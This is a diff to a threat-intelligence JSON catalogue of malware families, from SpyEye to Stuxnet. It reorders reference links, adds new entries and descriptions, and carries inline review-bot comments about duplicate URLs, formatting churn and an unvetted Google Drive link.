"https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot", + "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", + "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/", + "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393" ], "synonyms": [], "type": [] 
@@ -45318,34 +47421,34 @@ "value": "SpyEye" }, { - "description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim’s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.", + "description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim\u2019s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. 
Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle", - "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", - "https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader", - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", "https://twitter.com/Max_Mal_/status/1442496131410190339", - "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", - "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", - "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", - "https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/", - "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", - "https://www.cynet.com/understanding-squirrelwaffle/", - "https://redcanary.com/blog/intelligence-insights-december-2021", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://www.malware-traffic-analysis.net/2021/09/17/index.html", + "https://www.cynet.com/understanding-squirrelwaffle/", + "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", + "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", + "https://redcanary.com/blog/intelligence-insights-december-2021", + 
"https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/", "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan", + "https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/", "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike", - "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", - "https://www.youtube.com/watch?v=9X2P7aFKSw0", - "https://security-soup.net/squirrelwaffle-maldoc-analysis/", - "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", - "https://twitter.com/jhencinski/status/1464268732096815105", + "https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", "https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/", - "https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/" + "https://security-soup.net/squirrelwaffle-maldoc-analysis/", + "https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/", + "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", + "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + "https://twitter.com/jhencinski/status/1464268732096815105", + 
"https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", + "https://www.malware-traffic-analysis.net/2021/09/17/index.html", + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://www.youtube.com/watch?v=9X2P7aFKSw0" ], "synonyms": [ "DatopLoader" @@ -45356,7 +47459,7 @@ "value": "Squirrelwaffle" }, { - "description": "", + "description": "According to PaloAlto, SquirtDanger is a commodity botnet malware family that comes equipped with a number of characteristics and capabilities. The malware is written in C# (C Sharp) and has multiple layers of embedded code. Once run on the system, it will persist via a scheduled task that is set to run every minute. SquirtDanger uses raw TCP connections to a remote command and control (C2) server for network communications.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", @@ -45374,8 +47477,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet", "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices", - "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/", - "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf" + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf", + "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/" ], "synonyms": [], "type": [] @@ -45388,9 +47491,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf" ], "synonyms": [], "type": [] 
@@ -45499,10 +47602,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stashlog", - "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", - "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive", "https://twitter.com/ESETresearch/status/1433819369784610828", - "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive" + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" ], "synonyms": [], "type": [] @@ -45515,11 +47618,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit", - "https://twitter.com/r3c0nst/status/1425875923606310913", - "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/", "https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis", + "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool", "https://securelist.com/new-ransomware-trends-in-2022/106457/", - "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool" + "https://twitter.com/r3c0nst/status/1425875923606310913", + "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/" ], "synonyms": [ "Corrempa" 
@@ -45534,8 +47637,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc", + "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/", + "https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets", "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/", - "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/" + "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_config_extractor.ipynb", + "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_string_decryption.py" ], "synonyms": [], "type": [] 
@@ -45544,12 +47650,12 @@ "value": "Stealc" }, { - "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.", + "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor\u2019s addresses if the victim makes a transaction. 
The stolen information is sent to a Discord channel using a Discord Webhook.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium", - "https://github.com/Stealerium/Stealerium", - "https://resources.securityscorecard.com/research/stealerium-detailed-analysis" + "https://resources.securityscorecard.com/research/stealerium-detailed-analysis", + "https://github.com/Stealerium/Stealerium" ], "synonyms": [], "type": [] @@ -45562,8 +47668,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/" ], "synonyms": [], "type": [] 
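Review bot: The Stealer0x3401 `refs` array still contains the same PT Security URL twice, once with and once without the trailing slash (`.../apt31-cloud-attacks` and `.../apt31-cloud-attacks/`); the hunk only swaps their order, so the duplicate survives regeneration. Keeping a single canonical form, `"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/"`, and normalising trailing slashes in the import step would prevent this class of near-duplicate, which also shows up elsewhere in the patch as mirrored Symantec/Broadcom and G DATA URLs. This is a data-quality rather than a security issue, but near-duplicate references inflate the file and make the ordering churn harder to read.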
@@ -45572,7 +47678,7 @@ "value": "Stealer0x3401" }, { - "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target’s backend. Hacker’s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.", + "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target\u2019s backend. Hacker\u2019s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target\u2019s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", 
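Review bot: The only change to the StealthWorker description is that the literal `’` is now written as the escape `\u2019`, which is semantically identical JSON and suggests the file was re-serialised with a different tool or setting (ASCII escaping enabled) than the one that produced the previous revision; the same no-op rewrite appears in the Squirrelwaffle and Stealerium descriptions in this patch. Either form is acceptable, but pinning one canonical formatter so the two cannot alternate between regenerations would keep descriptions byte-stable and stop this reappearing as churn. Also, `Hacker\u2019s commonly take advantage` carries a stray apostrophe from the quoted Fortinet text and would read correctly as `Hackers commonly take advantage`, though as a verbatim quotation it may be intentional.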
@@ -45585,11 +47691,25 @@ "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea", "value": "StealthWorker Go" }, + { + "description": "Check Point Research observed a wave of highly-targeted espionage attacks in Libya that utilize a new custom modular backdoor. Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealth_soldier", + "https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07a24653-0f0b-49cf-944d-b4686b7e48d0", + "value": "Stealth Soldier" + }, { "description": "Malware written in .NET that hides in Steam profile pictures. Tries to evade virtualization through detection if it is executed within VMWare or VirtualBox.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.steamhide", + "https://www.gdatasoftware.com/blog/2021/06/36861-malware-hides-in-steam-profile-images", "https://www.gdatasoftware.com/blog/steamhide-malware-in-profile-images" ], "synonyms": [], 
@@ -45629,12 +47749,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail" ], "synonyms": [], "type": [] 
@@ -45647,25 +47767,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b", + "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/", + "https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view", + "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", + "https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/", + "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads", "https://securelist.com/keypass-ransomware/87412/", "https://intel471.com/blog/privateloader-malware", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/", - "https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b", - "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", - "https://angle.ankura.com/post/102het9/the-stop-ransomware-variant", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", - 
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads", - "https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list", - "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/", - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", - "https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/" + "https://angle.ankura.com/post/102het9/the-stop-ransomware-variant", + "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/" ], "synonyms": [ "Djvu", @@ -45694,9 +47815,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway", - "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", "https://blog.exatrack.com/melofee/", - "https://github.com/ph4ntonn/Stowaway" + "https://github.com/ph4ntonn/Stowaway", + "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government" ], "synonyms": [], "type": [] 
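Review bot: The STOP/Djvu `refs` array gains `"https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view"`, a Google Drive share link with no publisher, title or date, which is neither a stable nor an auditable citation: the owner can change or remove the file at will, and analysts following links from a threat-intel dataset should not be routed to an unvetted Drive download. If the document has a public home (a vendor blog or report page) that URL should replace the Drive link; otherwise consider omitting it. Relatedly, `"http://malware-traffic-analysis.net/2017/01/17/index2.html"` in the Spora hunk earlier in this patch is plain HTTP while the same site is cited over HTTPS for Squirrelwaffle, so upgrading the scheme there is a low-risk follow-up.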
@@ -45716,12 +47837,27 @@ "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", "value": "Stration" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stratofear", + "https://www.mandiant.com/resources/blog/north-korea-supply-chain" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a968a42e-4162-46db-a96e-2a45927d1cd7", + "value": "STRATOFEAR" + }, { "description": "According to PCRisk, StrelaStealer seeks to extract email account log-in credentials. At the time of writing, this program targets Microsoft Outlook and Mozilla Thunderbird email clients.\r\n\r\nFollowing successful infiltration, StrelaStealer searches for \"logins.json\" (account/password) and \"key4.db\" (password database) within the \"%APPDATA%\\Thunderbird\\Profiles\\\" directory - by doing so, it can acquire the credentials for Thunderbird.\r\n\r\nAlternatively, if Outlook credentials are targeted - StrelaStealer seeks out the Windows Registry from where it can retrieve the program's key and \"IMAP User\", \"IMAP Server\", as well as the \"IMAP Password\" values. Since the latter is kept in an encrypted form, the malicious program employs the Windows CryptUnprotectData feature to decrypt it prior to exfiltration.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer", - "https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc" + "https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc", + "https://research.openanalysis.net/strelastealer/stealer/2023/05/07/streala.html", + "https://cert-agid.gov.it/news/analisi-tecnica-e-considerazioni-sul-malware-strela/" ], "synonyms": [], "type": [] 
@@ -45734,9 +47870,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", - "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/", + "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/" ], "synonyms": [], @@ -45751,8 +47887,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat", "https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff", - "https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard", - "https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations" + "https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations", + "https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard" ], "synonyms": [], "type": [] 
@@ -45762,26 +47898,40 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strikesuit_gift",
+ "https://assets.stairwell.com/hubfs/Marketing-Assets/Stairwell-threat-report-The-origin-of-APT32-macros.pdf",
+ "https://ti.qianxin.com/blog/articles/english-version-of-new-approaches-utilized-by-oceanLotus-to-target-vietnamese-environmentalist/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ec2a5a29-a142-447c-85b9-ec47e78f9cb2",
+ "value": "StrikeSuit Gift"
+ },
+ {
+ "description": "According to Mitre, StrongPity is an information stealing malware used by PROMETHIUM.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
+ "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity",
 "https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4",
 "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html",
- "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/",
- "https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/",
+ "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
 "https://twitter.com/physicaldrive0/status/786293008278970368",
 "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf",
- "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg",
- "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
+ "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/",
+ "https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/",
 "https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
 "https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara",
- "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/",
+ "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg",
 "https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation",
- "https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA"
+ "https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA",
+ "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html"
 ],
 "synonyms": [],
 "type": []
@@ -45794,24 +47944,24 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet",
- "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147",
- "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
- "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf",
- "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
 "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
 "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/",
- "https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf",
 "https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf"
+ "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet",
+ "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
+ "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -45824,10 +47974,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.subzero",
